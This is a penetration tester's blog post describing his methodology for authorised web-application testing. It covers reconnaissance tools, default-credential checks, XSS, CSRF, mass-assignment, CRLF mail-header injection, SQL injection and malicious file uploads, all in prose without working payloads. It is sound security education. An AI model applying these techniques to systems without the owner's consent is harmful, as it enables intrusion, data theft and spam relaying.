I am a RoR-developer gone pen-testing for the last couple of months. Clients range from smallish web portals to large multi-national financial institutions. So far I’ve a success rate well above 85%.
This post reflects upon my modus operandi. It contains a high-level view of how I work: while specific techniques change the overall frame-of-mind stays the same, so I consider the latter more important than the former. Also I hope for feedback regarding techniques and tools.
Preparation
First of all open some text editor: I don’t care if it’s vim, Emacs, TextMate, OpenOffice writer, just open one. Capture and add everything to the document. Take screenshots. This might seem tedious at first but you’ll need this information for your final client report. I’m currently using OpenOffice for this. If you have any good template for this (preferably in something that works well with a VCS) feel free to send me that!
Then get the client’s written consent for the tests, protect yourself against any claim for compensation in case of service downtime. Also make sure that the web site is actually owned by your client. I’m sometimes reminded of an incident three or four years ago: a friend of mine lost his keys in the middle of the night, called a locksmith and then got his flat open for 100 Euros without showing any sort of ID. At least it was his flat.
Reconnaissance
First of all think about your client: what data is dear to him? How could he be embarrassed publicly? How can I, as an attacker, gain a benefit from taking over the client’s website? Can I steal money by capturing the advertisement subsystem or by selling user data?
I usually start reconnaissance with a simple “nmap -A” scan and then direct my web browser to the web application in common. Note all found software versions in your lab document, then check if there are known vulnerabilities. I’m using cvedetails for this – actually I have some small ruby script that automates some of my searches. Theoretically it should be possible to use nmap NSE to fully automate this, if anyone has one script for doing this, please contact me.
Next I check the used HTTPS versions and certificates with TLSSLed.
Then I compare my results with the Information extracted by Acunetix – mostly because the company already owns a license. You can use whatever floats your boat: Nessus, OpenVAS, Nexpose, w3af. If you have any suggestions or experience with one of those, please comment!
The reconnaissance phase is concluded by testing for forgotten auxiliary software (think webadmin, phpmyadmin, etc.), if found I test them against a list of default and common passwords. This might sound stupid to do, but I’ve actually found a phpmyadmin installation using default credentials on a clients public website – and that wasn’t a small client but a multi-national company.
Don’t expect to find a smoking gun within the reconnaissance phase. While you can easily find vulnerable systems in general, chances that a given system is vulnerable are far lower. You’ll mostly find DoS-possibilities, not shiny at all. But still, it would be embarrassing if you missed a hole like that.
Get a Feeling for the Website
In this phase I just browse through the clients web-application to get its feel: which frameworks were used, which code was added by the software developers to integrate the used frameworks. Most software components are fairly secure by now, but the integration code between them isn’t. I’ve been software developer for over a decade for now: there’s always some last-minute feature that ‘must’ be implemented and for which there’s way too few time. Search the seams and the last-minute code!
If you look at the HTML code, search for comments. I’ve often seen implementation notes and old code commented out with HTML comments. Somehow there seems to be a group of software developers that think that commenting out code makes it invisible.
Currently I’m using Firefox for most of my work, there are some essential plugins: Wappalyzer for showing used tool-kits, Live HTTP Headers for a deeper look upon the communication. You can use the default Firefox web developer tools or FireBug to get a better look at the site’s source code. Sometimes you need to fake your browser/user agent id (esp. for sites that only accept Internet Explorers), for this I use User Agent Switcher.
I ’ve used Fiddler2 for analyzing the communication of SilverLight code and was rather pleasantly surprised by its output. Now I’m looking into burp, ZAP and WebScarab. The advantage of using a transparent HTTP/S proxy would be better documentation, replay possibilities and semi-automatically generated lists of possible SQLi/XSS endpoints.
Be on the lookout for URLs that contain code that resembles SQL statements. If you find any note them for later.
Attack!
After all that reconnaissance it’s time to have some fun:
Session-Hijacking
Web applications are depending upon cookies and session-ids to track and identify their users. If a website transfers the session information through an insecure channel (HTTP) attackers can impersonate the given user. In addition if there’s some XSS exploit (see the later section) an attacker could use this to extract session information. In addition just check if session ids are regenerated during the login or logout process. There are many web sites out there that re-use the same session-id over and over again. If so you are able to hijack all subsequent user sessions that are created on that computer.
What if your client does not believe you? Just give a quick demonstration using your Android Phone with dSploit.
XSS
With an XSS attack you try to inject JavaScript code into a website which is then executed within the browser of another user. This code attacks the user itself or utilizes the elevated privileges of the user to alter or extract information from the client’s server. Easy to do. XSS attacks have been around around for long. Why are they still viable for pen-testing? Because you can inject JavaScript almost everywhere.
Now you’ve found some way of injecting JS. Now you’ll have to exploit it. You can utilize JS to replace some HTML code and deface the website, execute some actions on behalf of the user (CSRF) or steal user data (including session credentials). Read Postcards from the post-XSS world for a in-depth introduction to XSS.
Attack Forms
Oh HTML forms, everyone loves HTML forms! Start looking for forms that lead to data manipulation. For example if you have a form allowing manipulating one’s user profile search for hidden fields. Chances are that there is a hidden HTML field called “user_id” or so.. try if you can bypass ACL systems and alter other user’s data.
Programmers are lazy (at least I am) so many web frameworks allow mass-assignment of objects: this means that the content of a form is used to update a data objects attributes. Try if you can sneak in additional parameters and change something, ie. your user’s role – this can mostly be done with newer web 2.0y frameworks.
Essential tools for doing this sort of stuff are TamperData and Poster.
I really do like CSRF attacks: instead of attacking the client’s website yourself you get a user’s browser to do all the work for you. As the user’s browser is already authenticated this bypasses all authentication. How to do this? Search a form that has no CSRF protection and alters data, now create a HTML page that calls that form via JavaScript and get one user to view that HTML page. Combine this with an XSS vector if possible.
There’s a special kind of stupidity that leads to insecure ‘contact me’/‘mail someone’ forms. If you find some contact form that allows sending of seemingly constrained mails try to do some CRLF-injects: add some ‘\r\n’, etc. to fields that get copied into the message’s mail header. If you do find one of those you’ll have found a anonymous open mail/spam relay. Send some disturbing mails to your client (form his own mail address) for extra points.
SQL Injections
If you had found some forms or HTML-parameters that look susceptible to SQL injection attacks now’s the time to attack it – just do the simple and easy variations yourself, and if you were not able to find anything utilize sqlmap.
Investigate Charts, APIs, Upload and Download facilities
In my experience most charting tools, download and upload facilities are added to an existing solution and might not heed the typical ACL systems.
I’ve seen chart components that generated charts for a passed user-id that happily accepted any possible user-id, I’ve seen download services that not only allowed downloading of the ‘right’ documents but rather downloading every file on a server. It helps if you can automate your tests, so learn some Ruby or Python.
Lookout for upload functionality: if you can upload an arbitrary file and then somehow get it to be included or executed you have a very large entry point to the system.
Another often neglected attack vector are API endpoints. They might be used to connect mobile devices or flash/SilverLight applets to the web application’s business data and/or business logic. While being publicly accessible they are not openly advertised for end-users and thus often not very well tested security-wise. There seems to be a special breed of developers that believe that no-one will ever directly talk to the API endpoint and do all their access-right and permission checking within their Flash/SilverLight applets.
Using the server as a payload distribution service
Many web applications allow uploading active content as pdf or word files. You can include back doors in those kind of files, imagine what you can do with that. Almost no web application actually employs a malware scanner to check user-supplied files.
While this doesn’t target the web application itself, it targets its users. It sounds like a moot point, but currently there are unpatched Adobe PDF - based exploits running around and infecting computers.
Final words
Most of all: have fun. I’ve been a web developer for some years, now I’m doing pen testing. Mostly I’m learning to exploit all the errors that I’ve been guilty of doing myself when under time or budgetary constraints. I’ll be a better web developer after that.